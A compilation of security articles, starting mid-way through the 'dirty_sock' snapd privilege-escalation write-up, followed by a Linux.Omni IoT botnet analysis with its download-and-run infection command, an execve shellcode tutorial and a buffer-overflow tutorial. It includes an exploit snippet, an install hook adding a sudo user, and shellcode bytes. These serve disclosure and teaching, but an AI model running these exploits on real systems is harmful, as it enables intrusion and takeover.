That looks pretty good. It sees my uid of 1000 and is going to deny me access to the sensitive API functions. Or, at least it would if these variables were called exactly in this state. But they are not.

Instead, some additional processing happens in this function, where connection info is added to a new object along with the values discovered above:

func (wc *ucrednetConn) RemoteAddr() net.Addr {
	return &ucrednetAddr{wc.Conn.RemoteAddr(), wc.pid, wc.uid, wc.socket}
}

…and then a bit more in this one, where all of these values are concatenated into a single string variable:

func (wa *ucrednetAddr) String() string {
	return fmt.Sprintf("pid=%s;uid=%s;socket=%s;%s", wa.pid, wa.uid, wa.socket, wa.Addr)
}

..and is finally parsed by this function, where that combined string is broken up again into individual parts:

func ucrednetGet(remoteAddr string) (pid uint32, uid uint32, socket string, err error) {
...
	for _, token := range strings.Split(remoteAddr, ";") {
		var v uint64
...
		} else if strings.HasPrefix(token, "uid=") {
			if v, err = strconv.ParseUint(token[4:], 10, 32); err == nil {
				uid = uint32(v)
			} else {
				break
}

What this last function does is split the string up by the “;” character and then look for anything that starts with “uid=”. As it is iterating through all of the splits, a second occurrence of “uid=” would overwrite the first.

If only we could somehow inject arbitrary text into this function…

Going back to the delve debugger, we can take a look at this “remoteAddr” string and see what it contains during a “nc” connection that implements a proper HTTP GET request:

Request:

$ nc -U /run/snapd.socket
GET / HTTP/1.1
Host: 127.0.0.1

Debug output:

github.com/snapcore/snapd/daemon.ucrednetGet()
...
=>  41:		for _, token := range strings.Split(remoteAddr, ";") {
...
(dlv) print remoteAddr
"pid=5127;uid=1000;socket=/run/snapd.socket;@"

Now, instead of an object containing individual properties for things like the uid and pid, we have a single string variable with everything concatenated together. This string contains four unique elements. The second element “uid=1000” is what is currently controlling permissions.

If we imagine the function splitting this string up by “;” and iterating through, we see that there are two sections that (if containing the string “uid=”) could potentially overwrite the first “uid=”, if only we could influence them.

The first (“socket=/run/snapd.socket”) is the local “network address” of the listening socket — the file path the service is defined to bind to. We do not have permissions to modify snapd to run on another socket name, so it seems unlikely that we can modify this.

But what is that “@” sign at the end of the string? Where did this come from? The variable name “remoteAddr” is a good hint. Spending a bit more time in the debugger, we can see that a golang standard library (net.go) is returning both a local network address AND a remote address. You can see these output in the debugging session below as “laddr” and “raddr”.

> net.(*conn).LocalAddr() /usr/lib/go-1.10/src/net/net.go:210 (PC: 0x77f65f)
...
=> 210:	func (c *conn) LocalAddr() Addr {
...
(dlv) print c.fd
...
	laddr: net.Addr(*net.UnixAddr) *{
		Name: "/run/snapd.socket",
		Net: "unix",},
	raddr: net.Addr(*net.UnixAddr) *{Name: "@", Net: "unix"},}

The remote address is set to that mysterious “@” sign. Further reading the man unix help pages provides information on what is called the “abstract namespace”. This is used to bind sockets which are independent of the filesystem. Sockets in the abstract namespace begin with a null-byte character, which is often displayed as “@” in terminal output.

Instead of relying on the abstract socket namespace leveraged by netcat, we can create our own socket bound to a file name that we control. This should allow us to affect the final portion of that string variable that we want to modify, which will land in the “raddr” variable shown above.

Using some simple python code, we can create a file name that has the string “;uid=0;” somewhere inside it, bind to that file as a socket, and use it to initiate a connection back to the snapd API.

Here is a snippet of the exploit POC:

## Setting a socket name with the payload included
sockfile = "/tmp/sock;uid=0;"

## Bind the socket
client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_sock.bind(sockfile)

## Connect to the snap daemon
client_sock.connect('/run/snapd.socket')

Now watch what happens in the debugger when we look at the remoteAddr variable again:

> github.com/snapcore/snapd/daemon.ucrednetGet()
...
=>  41:		for _, token := range strings.Split(remoteAddr, ";") {
...
(dlv) print remoteAddr
"pid=5275;uid=1000;socket=/run/snapd.socket;/tmp/sock;uid=0;"

There we go — we have injected a false uid of 0, the root user, which will be at the last iteration and overwrite the actual uid. This will give us access to the protected functions of the API.

We can verify this by continuing to the end of that function in the debugger, and see that uid is set to 0. This is shown in the delve output below:

> github.com/snapcore/snapd/daemon.ucrednetGet()
...
=>  65:		return pid, uid, socket, err
...
(dlv) print uid
0

Weaponizing

Version One

dirty_sockv1 leverages the ‘POST /v2/create-user’ API function. To use this exploit, simply create an account on the Ubuntu SSO and upload an SSH public key to your profile. Then, run the exploit like this (using the email address you registered and the associated SSH private key):

$ dirty_sockv1.py -u you@email.com -k id_rsa

This is fairly reliable and seems safe to execute. You can probably stop reading here and go get root.

Still reading? Well, the requirement for an Internet connection and an SSH service bothered me, and I wanted to see if I could exploit in more restricted environments. This leads us to…

Version Two

dirty_sockv2 instead uses the ‘POST /v2/snaps’ API to sideload a snap containing a bash script that will add a local user. This works on systems that do not have the SSH service running. It also works on newer Ubuntu versions with no Internet connection at all. HOWEVER, sideloading does require some core snap pieces to be there. If they are not there, this exploit may trigger an update of the snapd service. My testing shows that this will still work, but it will only work ONCE in this scenario.

Snaps themselves run in sandboxes and require digital signatures matching public keys that machines already trust. However, it is possible to lower these restrictions by indicating that a snap is in development (called “devmode”). This will give the snap access to the host Operating System just as any other application would have.

Additionally, snaps have something called “hooks”. One such hook, the “install hook” is run at the time of snap installation and can be a simple shell script. If the snap is configured in “devmode”, then this hook will be run in the context of root.

I created a snap from scratch that is essentially empty and has no functionality. What it does have, however, is a bash script that is executed at install time. That bash script runs the following commands:

useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock    ALL=(ALL:ALL) ALL" >> /etc/sudoers

That encrypted string is simply the text dirty_sock created with Python’s crypt.crypt() function.

The commands below show the process of creating this snap in detail. This is all done from a development machine, not the target. One the snap is created, it is converted to base64 text to be included in the full python exploit.

## Install necessary tools
sudo apt install snapcraft -y

## Make an empty directory to work with
cd /tmp
mkdir dirty_snap
cd dirty_snap

## Initialize the directory as a snap project
snapcraft init

## Set up the install hook
mkdir snap/hooks
touch snap/hooks/install
chmod a+x snap/hooks/install

## Write the script we want to execute as root
cat > snap/hooks/install << "EOF"
#!/bin/bash

useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock    ALL=(ALL:ALL) ALL" >> /etc/sudoers
EOF

## Configure the snap yaml file
cat > snap/snapcraft.yaml << "EOF"
name: dirty-sock
version: '0.1' 
summary: Empty snap, used for exploit
description: |
    See https://github.com/initstring/dirty_sock

grade: devel
confinement: devmode

parts:
  my-part:
    plugin: nil
EOF

## Build the snap
snapcraft

If you don’t trust the blob I’ve put into the exploit, you can manually create your own with the method above.

Once we have the snap file, we can use bash to convert it to base64 as follows:

$ base64 <snap-filename.snap>

That base64-encoded text can go into the global variable “TROJAN_SNAP” at the beginning of the dirty_sock.py exploit.

The exploit itself is writen in python and does the following:

  1. Creates a random file with the string ‘;uid=0;’ in the name
  2. Binds a socket to this file
  3. Connects to the snapd API
  4. Deletes the trojan snap (if it was left over from a previous aborted run)
  5. Installs the trojan snap (at which point the install hook will run)
  6. Deletes the trojan snap
  7. Deletes the temporary socket file
  8. Congratulates you on your success
screenshot

Protection / Remediation

Patch your system! The snapd team fixed this right away after my disclosure.

Special Thanks

  • So many StackOverflow posts I lost track…
  • The great resources put together by the snap team

Author

Chris Moberly (@init_string) from The Missing Link.

Thanks for reading!!!

Analysis of Linux.Omni

( Original text by by   )

Following our classification and analysis of the Linux and IoT threats currently active, in this article we are going to investigate a malware detected very recently in our honeypots, the Linux.Omni botnet. This botnet has particularly attracted our attention due to the numerous vulnerabilities included in its repertoire of infection (11 different in total), being able to determine, finally, that it is a new version of IoTReaper.

Analysis of the binary

The first thing that strikes us is the label given to the malware at the time of infection of the device, i.e., OMNI, because these last few weeks we were detecting OWARI, TOKYO, SORA, ECCHI… all of them versions of Gafgyt or Mirai and, which do not innovate much compared to what was reported in previous articles.

So, analyzing the method of infection, we find the following instructions:

As you can see, it is a fairly standard script and, therefore, imported from another botnet. Nothing new.

Although everything indicated that the sample would be a standard variant of Mirai or Gafgyt, we carried out the sample download.

The first thing we detect is that the binary is packaged with UPX. It is not applied in most samples, but it is not uncommon to see it in some of the more widespread botnet variants.

After looking over our binary, we found that the basic structure of the binary corresponds to Mirai.

However, as soon as we explore the binary infection options, we find attack vectors that, in addition to using the default credentials for their diffusion, use vulnerabilities of IoT devices already discovered and implemented in other botnets such as IoTReaper or Okiru / Satori, including the recent one that affects GPON routers.

Let’s examine which are these vulnerabilities that Omni uses:

Vacron

Vulnerability that makes use of code injection in VACRON network video recorders in the “board.cgi” parameter, which has not been well debugged in the HTTP request parsing. We also found it in the IoTReaper botnet.

Netgear – CVE-2016-6277

Another of the vulnerabilities found in Omni is CVE-2016-6277, which describes the remote execution of code through a GET request to the “cgi-bin/” directory of vulnerable routers. These are the following:

R6400                         R7000
R7000P           R7500
R7800                         R8000
R8500                         R9000

D-Link – OS-Command Injection via UPnP

Like IoTReaper, Omni uses a vulnerability of D-link routers. However, while the first used a vulnerability in the cookie overflow, the hedwig.cgi parameter, this one uses a vulnerability through the UPnP interface.

The request is as follows:

And we can find it in the binary:

The vulnerable firmware versions are the following:

DIR-300 rev B – 2.14b01
DIR-600 – 2.16b01
DIR-645 – 1.04b01
DIR-845 – 1.01b02
DIR-865 – 1.05b03

CCTV-DVR 

Another vulnerability found in the malware is the one that affects more than 70 different manufacturers and is linked to the “/language/Swedish” resource, which allows remote code execution.

The list of vulnerable devices can be found here:

http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html

D-Link – HNAP

This is a vulnerability reported in 2014 and which has already been used by the malware The Moon, which allows bypassing the login through the CAPTCHA and allows an external attacker to execute remote code.

The vulnerable firmware versions on the D-Link routers are the following:

DI-524 C1 3.23
DIR-628 B2 1.20NA 1.22NA
DIR-655 A1 1.30EA

TR-069 – SOAP

This vulnerability was already exploited by the Mirai botnet in November 2016, which caused the fall of the Deutsche Telekom ISP.

The vulnerability is as follows:

We can also find it in the binary.

Huawei Router HG532 – Arbitrary Command Execution

Vulnerability detected in Huawei HG532 routers in the incorrect validation of a configuration file, which can be exploited through the modification of an HTTP request.

This vulnerability was already detected as part of the Okiru/Satori malware and analyzed in a previous article: (Analysis of Linux.Okiru)

Netgear – Setup.cgi RCE

Vulnerability that affects the DGN1000 1.1.00.48 firmware of Netgear routers, which allows remote code execution without prior authentication.

Realtek SDK

Different devices use the Realtek SDK with the miniigd daemon vulnerable to the injection of commands through the UPnP SOAP interface. This vulnerability, like the one mentioned above for Huawei HG532 routers, can already be found in samples of the Okiru/Satori botnet.

GPON

Finally, we found the latest vulnerability this past month, which affects GPON routers and is already incorporated to both IoT botnets and miners that affect Linux servers.

On the other hand, the botnet also makes use of diffusion through the default credentials (the way our honeypot system was infected), although these are encoded with an XOR key different from the 0x33 (usual in the base form) where each of the combinations has been encoded with a different key.

Infrastructure analysis

Despite the variety of attack vectors, the commands executed on the device are the same:

cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}

The downloaded file is a bash script, which downloads the sample according to the architecture of the infected device.

As we can see, this exploit does not correspond with the analyzed sample, but is only dedicated to the search of devices with potentially vulnerable HTTP interfaces, as well as the vulnerability check of the default credentials, thus obtaining two types of infections, the one that uses the 11 previously mentioned vulnerabilities and the one that only reports the existence of exposed HTTP services or default credentials in potential targets.

Therefore, the architecture is very similar to the one found previously in the IoTReaper botnet.

Behind Omni

Investigating the references in the binaries we find the IP address 213.183.53 [.] 120, which is referenced as a download server for the samples. Despite not finding a directory listing available (in other variants it is quite common to find it), in the root directory we find a “Discord” platform, which is (officially) a text and voice chat for the gamer audience.

So, since it didn’t require any permissions or special invitation, we decided to choose a megahacker name, and enter the chat.

Once inside, we observed that the general theme of the chat is not video games, but a platform for the sale of botnet services.

After a couple of minutes in the room, it follows that the person behind the infrastructure is the user Scarface, who has decided to make some very cool advertising posters (and according to the aesthetics of the film of the same name).

In addition, it also offers support, as well as requests from potential consumers seeking evidence that their botnet is capable of achieving a traffic volume of 60 Gbps.

We can find some rather curious behaviors that denote the unprofessional nature of this group of cybercriminals, for example how Scarface shows the benefit it has gained from the botnet (and how ridiculous the amount) or how they fear that any of those who have entered the chat are cops.

So, we can determine that the Linux.Omni malware is an updated version of the IoTReaper malware, which uses the same network architecture format, besides importing, practically, all the Mirai source code.

Attached is the Yara rule for detecting the Linux.Omni malware:

IoC

213.183.53[.]120
21aa9c42b42e95c98e52157fd63f36c289c29a7b7a3824f4f70486236a2985ff
4cf7e64c3b9c1ad5fa57d0d0bbdeb930defcdf737fda9639955be1e78b06ded6
6dfd411f2558e533728bfb04dd013049dd765d61e3c774788e3beca404e0fd73
000b018848e7fd947e87f1d3b8432faccb3418e0029bde7db8abf82c552bbc63
5ad981aefed712909294af47bce51be12524f4b547a63d7faaa40d3260e73235
31a2779c91846e37ad88e9803cbad8f8931e3229e88037f1d27437141ecbd164
528344fd220eff87b7494ca94caed6eae7886d8003ad37154fdb7048029e880b
cfca058a4d0a29b3da285a5df21b14c360fb3291dff3c941659fe27f3738ba3e
2b32375864d0849e676536b916465a1fbb754bbdf783421948023467d364fb4c
700c9b51e6f8750a20fcc7019207112690974dcda687a83626716d8233923c17
feb362167c9251dd877a0d76d3b42b68fcd334181946523ca808382852f48b7d
ca6bc4e4c490999f97ee3fd1db41373fc0ba114dce2e88c538998d19a6f694da
fc4cfc6300e3122ef9bbe6da3634d3b9839e833e4fc2cea8f1498623398af015
0fd93aeb2af3541daa152d9aff8388c89211b99d46ead1220c539fa178543bca
02a61e1d80b1f25d161de8821a31cd710987772668ce62c8be6d9afabe932712
377a49403cef46902e77ff323fcc9a8f74ea041743ccdbff41de3c063367c99a
812aa39075027b21671e5a628513378c598aef0feb57d0f5d837375c73ade8e8
c9caccd707504634185ee2a94302e3964fb6747963e7020dffa34de85bd4d2ce
a159c7b5d2c38071eb11f5e28b26f7d8beaf6f0f19a8c704687f26bfa9958d78
5eb7801551ee15baec5ef06b0265d0d0cc8488f16763517344bb8456a2831b82
2f1d0794d24b7b4f164ebce5bdde6fccd57cdbf91ea90ec2f628caf7fd991ce4

(N.d.E.: Original post in Spanish)

Linux Buffer Overflows x86 – Part 3 (Shellcoding)

( Original text by SubZero0x9 )

Hello guys, this is the part 3 of the Linux buffer Overflows x86. In this part we will learn what is shellcode, why do we use it and how do we use it. In the previous two blogs, we learnt about process memory, stack region, stack operations, stack registers, attempting buffer overflow, overwriting buffer, modifying return address, manipulating program flow and program execution.
If you have not read the first two blogs, here are the links Part1 and Part2.

The main purpose behind exploiting Buffer Overflow is to spawn a reverse shell or execute arbitrary commands at least. Even if we find a vulnerable binary with stack overflow and are able to overwrite the return address, we still have to tell the binary to execute commands on our behalf. But how do we do that? Suppose we want to spawn a shell of a vulnerable binary, but the code to spawn a shell is not present in the binary. So, even if we control the flow of the binary we really can’t modify the return address to a memory address which can execute the code which spawns a shell. We saw in the previous two blogs, we were able to overwrite the buffer with any arbitrary data. This means, when the program is loaded into memory all the operations are carried out on the stack. Any user input accepted will be stored on the stack and if the program accepts malicious input (remember insufficient bound checking) it also gets stored on the stack. So instead of placing random data, if we place the code which we want to execute on to the stack it will give us the results.
Simple Right? NO !!

We can’t simply go ahead and paste the code of spawning a shell onto the buffer, because when the program is running it is loaded into the system memory and it communicates with the processor for carrying out the operations through syscalls which is understood by kernel who actually communicates with the processor to get things done(well this is a simplified statement, the actual process is too complex). Now the processor doesn’t understand C,C++, JAVA, Python, etc. it only understands the machine code which it can directly execute. And We, human beings can’t understand machine code so we write programs in high level languages. Also, machine code is mostly regarded as the lowest level representation of compiled code. Another main reason we use machine code is because of the size. The space available in the stack for operations are very limited and machines codes are really compact in that sense.

SHELLCODE

So till now it is pretty clear that the code or payload used to exploit the buffer overflow vulnerability to execute arbitrary commands is called Shellcode. Its name is derived from the fact that it was initially used to spawn a root shell. Shellcode is basically a set of machine code or set of instructions injected into the buffer of the vulnerable program. The vulnerable program then executes the shellcode.

Shellcodes are machine codes. Basically, we write a set of instructions in a high level language or assembly language then convert into hexadecimal values (these values are just a bunch of opcodes and operands understood by the processor).

We cannot run shellcode directly, instead it needs a some sort of carrier (buffer, file, process, environment variables, etc) which will be read or executed by the vulnerable software. There are many shellcode execution strategies which are used depending on the exploitability and constraints of the vulnerable software.

Shellcodes are written mainly to force the program to do actions on the behalf of the attacker. The attacker can write a specific function which will do the intended action once loaded into the same address space of the vulnerable software. Every action (well almost) in an operating system is done by calling a syscall or system calls. The shellcode will also contain a syscall for a specific action which the attacker needs to perform. Syscalls are the most important thing in the shellcode as you can force the program to perform action just by triggering a syscall.

SYSCALLS

According to wikipedia, “In computing, a system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. ”

Linux’s security mechanism (the ring model) is divided into two spaces : User Space and Kernel space. Eevery process running in the userspace has its own virtual address space and cannot access any other processes address space until explicitly allowed. When the process in the userspace wants to access the kernel space to execute some operations, it cannot directly access it. No processes in the userspace can access the kernel space.

When an userspace process tries to access the kernel, an exception is raised and prevents the process from accessing the kernel space. The userspace processes uses the syscalls to communicate with the kernel processes to carry out the operations.

Syscalls are a bunch of functions which gives a userland process direct access to the kernel space to carryout low level functions. In simpler words, Syscalls are an interface between user mode and kernel mode.

In Linux, syscalls are generated using the software interrupt instruction, int 0x80. So, when a process in the user mode executes the int 0x80 instruction, the flow is transferred from the user mode to kernel mode by the CPU and the syscall is executed. Other than syscalls, there are standard library functions like the libc (which is extensively used in the linux OS). These standard library functions also call the syscall in some way or another (not everytime though). But we wont look into that as we are not going to use library functions in our shellcode. Also, using syscall is much nicer because there is no linking involved with any library as needed in other programming languages.

Note: The software interrupt int 0x80 was proving to be slower on the Pentium processors, so Linus introduced two new alternative namely SYSENTER/SYSEXIT instructions which were provided by all Pentium II+ processors. We will use the int 0x80 instruction in our shellcode however.

HOW TO USE SYSCALLS

When a process is in the userspace and the syscall instruction is executed, the interrupt handler i.e the software interrupt int 0x80 tells the CPU to change the execution from user mode to kernel mode. Now the system call handler is notified to call the routine which the userland process wanted. All the syscalls are stored in a syscall table, it is a big array which points to the memory address of the syscall routines. When the syscall is called, the syscall number is loaded into EAX register, this is how the system call handler comes to know which system call routine to execute. Keep in mind that the execution done here is carried out on the Kernel space stack and after the execution the control is given back to the userspace process and the remaining operation is carried out on userspace stack.

Here is the list of all the syscalls (x86):- http://syscalls.kernelgrok.com/

Each syscall is assigned a syscall number (an integer value) for basic naming convention. Every syscall has arguments which are necessary to execute the related operations. The syscall number is stored in the EAX register and the arguments are stored in the EBX , ECX , EDX , ESI and EDI respectively.

All the linux syscalls are well documented with instructions of how to implement them in your program. Usually we can use the syscall in normal C program or we can go ahead and do the same in an assembly language. Since we are writing our own shellcode, we have to dip our hands in the world of assembly language.

So what we will do is, write a C program with the syscall, disassemble the program, see the assembly instructions, write the assembly equivalent, make the necessary changes and extract the shellcode. Now we could have done this in assembly language directly but for getting the whole idea of how a program works from the high level to low level I am choosing this path.

Basic Assembly knowledge is needed for this, if you are new to Assembly then you can read the Assembly and Shellcoding blog series by my friend SLAER.

SPAWNING A SHELL

Lets write a shellcode for spawning a shell. We will use execve syscall for this operation.

First, lets take a look at the man page for execve..

The whole function looks like this:-

Here, filename is the command or program which we want to execute, in our case “/bin/sh”. Argv is an array of the argument string passed to the new program and it should contain the filename in its first index. Envp array can be NULL. Also the argvand envp array must end with a NULL.

We will initiate a char array spawnshell[2], with spawnshell[0]= “/bin/sh” and the next index being NULL i.e spawnshell[1]=NULL. We declared the last index as NULL because argv must end with a NULL byte.

So, execve will look like:

The C code for spawning a shell :

Compiling the program:

(We used static flag while compiling to prevent the dynamic linking as we want to disassemble the execve function.)

Running the executable we get a shell.

Lets disassemble the main function in our favorite GDB:

Here, the execve is called from the libc library, because we wrote a C program and used stdlib. Before calling the execve() function, the arguments required by it are stored on the stack. We will see the important instructions in detail:

sub $0x14, %esp -> Subtracting 14 from ESP, this is how the space is allocated on the stack.

1) movl $0x80bb868,-0x14(%ebp) -> Moving the memory address 0x80bb868 which contains “/bin/sh” on the stack. (You can see the value by using the command x/1s 0x80bb868 in GDB)

2) movl $0x0,-0x10(%ebp) -> Moving 0 on the stack at -0x10(%ebp), means the NULL byte after the “/bin/sh”.

3) mov -0x14(%ebp),%eax -> EAX now has the “/bin/sh”.

4) push $0x0 -> 0 is pushed onto the stack.

5) lea -0x14(%ebp),%edx -> The effective address of -0x14(%ebp) is loaded into EDX i.e EDX is pointing to the pointer of “/bin/sh”.

6) push %edx -> Pushing the value of EDX on the stack.

7) push %eax -> Pushing the value of EAX on the stack.

8)call 0x806c990 <execve> -> calling the function execve.

So what does this mean? Every numbered points are explained below in the same manner:-

1) filename = “/bin/sh”

2) filename = “/bin/sh” followed by NULL

3) argv[0]= “/bin/sh”

4) 0 is pushed for the envp

5) pointing to the pointer of “/bin/sh” i.e argv

6) EDX=argv

7) EAX= filename

8) execve function is called

Now the execve function according to the arguments pushed onto the stack will look like:-

execve(EAX, EDX,0)

So, now we know what to do with the assembly instructions. Lets write an assembly program for execve syscall.

Lets look at the execve syscall w.r.t assembly instructions:

Assembly program:-

Assemble this program:

Link this program:

Running the program we can see we get a shell.

Now, we want to extract the opcodes from the executable to form our shellcode. We will use objdump utility to display the object file.

Here, we can see in the right side, the assembly instructions that we wrote and in the left side opcodes for those instructions. Now we just have to copy these opcodes and execute it from C program which will act as a carrier for our shellcode.

Our Shellcode now is:

“\xc7\x05\xa8\x90\x04\x08\xa0\x90\x04\x08\xb8\x0b\x00\x00\x00\xbb\xa0\x90\x04\x08\xb9\xa8\x90\x04\x08\xba\xac\x90\x04\x08\xcd\x80\xb8\x01\x00\x00\x00\xbb\x0a\x00\x00\x00\xcd\x80”

As we already know we cannot execute shellcode directly, we will be needing a program to execute it for us. Shellcode is always loaded into the virtual address space of the target process which we want to exploit. Shellcode cant have its own process space as it cant be executed directly and it doesn’t makes sense to load the shellcode in any other address space other than the vulnerable software.

Just for demonstration we will load the shellcode in the address space of our own program and see whether it gets executed or not.

We will write a small C program which will execute our shellcode:

So, whats the program doing?

First, we are defining a char array shellcode with our actual shellcode in it. Then, in the main() function we are defining a variable ret which is an int pointer.

Then we are making the ret variable point to an address which is 8 bytes (2 int value)from its own address.

Remember this will happen on the stack, and the addresses on the stack moves from higher order memory to the lower order memory. So, by adding 8 bytes to the address of ret variable we are actually making it points towards the main()function.

Then we are assigning the address of our shellcode array to the address of the retvariable which is pointing to the address of main. So before the program ends it will execute our shellcode.

Lets compile the program:

Running the program we get Segmentation fault (core dumped)

So, we can see that our shellcode didn’t work. Lets take a look at what is wrong with our shellcode.

We can see there are a bunch of NULL bytes in the opcodes i.e ‘00’. Now one important thing, mostly the shellcode is loaded into the user input buffer and mostly it will be a char buffer or string buffer. If a NULL value occurs in the string, it terminates the string right there and doesn’t accept anything after the NULL termination. So our shellcode containing NULL values wont work. So we have to find a way to eliminate the NULL values.

Also, we are using hardcoded addresses in our shellcode. As we can see the mov instructions, all those addresses are machine specific hardcoded addresses. It is highly likely that it might not work in different versions of linux. So we have to deal with that also. One thing we can do is somehow load the starting address of our shellcode in the memory and using that reference we can make the necessary operations relative to this address. Now this is called as relative addressing. We will see this later in more detail.

Now the important part is to modify the assembly code with the two requirements mentioned above, getting rid of the NULL values and implementing relative addressing for avoiding hardcoded addresses .

REFINING THE SHELLCODE

So lets start…

From the above assembly program we know what instructions are needed to create our shellcode. In the above program we defined an ASCII string with “/bin/sh” and assigned the address of the string to another variable which will act as the pointer. But in the shellcode we will get the memory address of that variable and it will not work around different linux machines as the address may differ.

So in the manpages of the execve syscall it is clearly stated that, “The argv and envp arrays must each include a null pointer at the end of the array.” In our case envparray is already NULL, but the filename i.e the first index of argv pointer should also end with a NULL value. In the above assembly program we were defining separate variables for each argument of the syscall, but now we cant do that.

The execve syscall has three char pointer arguments. For the first argument we will have “/bin/shA”. We are appending A because we directly cant add a NULL value as it will hamper our shellcode, instead we will assign the index of A, a null value from the register. For the next char argument we will append four B’s as char is 4 bytes. Now the second argument is a pointer to the start of the address of the filename. Here we will assign the index of the starting B with the address of the starting memory address of filename. The third argument is the envp array which is a NULL pointer and we will append it with four C’s and then we will assign the index of the first C with a null value.

The representation of execve syscall arguments w.r.t registers will be like:

int execve(EBX, ECX, EDX); and the execve syscall number 11 will be loaded in the EAX register.

Below is the representation of the string which we will load along with the index in hex.

Lets take a look into the final assembly program for our shellcode.

Refined assembly program for Shellcode:

Now I will explain in detail what we have done.

-> We are starting our shellcode with a jmp instruction. jmp instruction will make an unconditional jump to the specified memory location. It will skip the actual shellcode and directly jump to the ShellcodeCall memory address.

-> In there the call instruction is executed which will directly point our Shellcode. Now what happens here is the most important thing. When the call instruction is executed the next instruction or memory address which contains the string “/bin/shABBBBCCCC” is pushed onto the top of the stack as the ret address. This is how we implement relative addressing.

->Now the pop instruction is executed. So the pop instruction will load the retaddress which has the string in the ESI register. The ESI register has the memory location which points to “/bin/shABBBBCCCC”. ESI register will be the reference point for all the operation which we will perform so the issue of hardcoded addresses will be resolved.

->Next we are XORing the EAX register to avoid the NULL bytes. We are basically resetting the EAX register without assigning a NULL value.

->Then we are loading the value 0 from the AL register (As we all know the ALregister is the lower part of the EAX address which is already 0 after the XORing) to the 7th index of the ESI register which will replace the A in our string with a null value.

-> Then we are loading the value of ESI i.e the start address of our string into the 8th index of ESI register replacing the B’s in our string.

->Then we are loading 0 from the AL register into the 12th index of our ESI register i.e replacing the C’s with 0’s.

-> Then we are loading the arguments of execve into the EBXECX and EDXregisters.

->Then we are loading the execve syscall number 11 into AL register again avoiding the NULL bytes because the higher part of the EAX register holds 0.

-> Lastly we make a software interrupt which will execute the syscall.

Now lets take a look at the opcodes after assembling and linking the assembly program.

As we can see there are no null bytes and the hardcoded addresses are also solved.

Now lets copy our shellcode into the C program which we wrote earlier to check whether our shellcode executes or not.

Lets run the compiled C program binary and see if it works.

VOILA !!!

We successfully spawned a shell with our own shellcode.

This was a very basic example of writing a working shellcode. Now there are many situations where you want take a reverse shell over the network and you have to write a shellcode for that. That would be a really challenging task to write a shellcode of that manner. This blog post only introduced what a shellcode looks like and how much pain you have to take to write a simple working shellcode.

In the next part, we will exploit a vulnerable binary and execute shellcode on that.

If you have any doubts or opinions, kindly express yourselves in the comment section. Thanks !!!

Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)

( Original text by SubZero0x9 )

Hello Friends, this is the 2nd part of the Linux x86 Buffer Overflows. First of all I want to apologize for such a long delay after the First blog of this series, there were personal and professional issues going on in my life (Well who hasn’t got them? Meh?).

In the previous part we learned about the Process Memory, Stack Region, Stack Operations, Stack Registers, Attempting Buffer Overflow, Overwriting Buffer, ESP and EIP. In case you missed it, here is the link to the Part 1:

https://movaxbx.ru/2018/11/06/getting-started-with-linux-buffer-overflows-x86-part-1-introduction/

Quick Recap to the Part 1:

-> We successfully exploited the insufficient bound checking by giving input which was larger than the buffer size, which led to the overflow.

-> We successfully attempted to overwrite the buffer and the EIP (Instruction Pointer).

-> We used GDB debugger to examine the buffer for our input and where it was placed on the stack.

Till now, we already know how to attempt a buffer overflow on a vulnerable binary. We already have the control of EIP and ESP.

So, Whats Next ?

Till now we have only overwritten the buffer. We haven’t really exploit anything yet. You may have read articles or PoC where Buffer Overflow is used to escalate privileges or it is used to get a reverse shell over the network from a vulnerable HTTP Server. Buffer Overflow is mainly used to execute arbitrary commands on the vulnerable system.

So, we will try to execute arbitrary commands by using this exploit technique.

In this blog, we will mainly focus on how to overwrite the return address to manipulate the flow of control and program execution.

Lets see this in more detail….

We will use a simple program to manipulate its intended output by changing the RETURN address.

(The following example is same as the AlephOne’s famous article on Stack Smashing with some modifications for a better and easy understanding)

Program:

 

This is a very simple program where the variable random is assigned a value ‘0’, then a function named function is called, the flow is transferred to the function()and it returns to the main() after executing its instructions. Then the variable random is assigned a value ‘1’ and then the current value of random is printed on the screen.

Simple program, we already know its output i.e 1.

But, what if we want to skip the instruction random=1; ?

That means, when the function() call returns to the main(), it will not perform the assignment of value ‘1’ to random and directly print the value of random as ‘0’.

So how can we achieve this?

Lets fire up GDB and see how the stack looks like for this program.

(I won’t be explaining each and every instruction, I have already done this in the previous blog. I will only go through the instructions which are important to us. For better understanding of how the stack is setup, refer to the previous blog.)

In GDB, first we disassemble the main function and look where the flow of the program is returned to main() after the function() call is over and also the address where the assignment of value ‘1’ to random takes place.

-> At the address 0x08048430, we can see the value ‘0’ is assigned to random.

-> Then at the address 0x08048437 the function() is called and the flow is redirected to the actual place where the function() resides in memory at 0x804840b address.

-> After the execution of function() is complete, it returns the flow to the main()and the next instruction which gets executed is the assignment of value ‘1’ to random which is at address 0x0804843c.

->If we want to skip past the instruction random=1; then we have to redirect the flow of program from 0x08048437 to 0x08048443. i.e after the completion of function() the EIP should point to 0x08048443 instead of 0x0804843c.

To achieve this, we will make some slight modifications to the function(), so that the return address should point to the instruction which directly prints the randomvariable as ‘0’.

Lets take a look at the execution of the function() and see where the EIP points.

-> As of now there is only a char array of 5 bytes inside the function(). So, nothing important is going on in this function call.

-> We set a breakpoint at function() and step through each instruction to see what the EIP points after the function() is exectued completely.

-> Through the command info regsiters eip we can see the EIP is pointing to the address 0x0804843c which is nothing but the instruction random=1;

Lets make this happen!!!

From the previous blog, we came to know about the stack layout. We can see how the top of the stack is aligned, 8 bytes for the buffer, 4 bytes for the EBP, 4 bytes for the RET address and so on (If there is a value passed as parameter in a function then it gets pushed first onto the stack when the function is called).

-> When the function() is called, first the RET address gets pushed onto the stack so the program flow can be maintained after the execution of function().

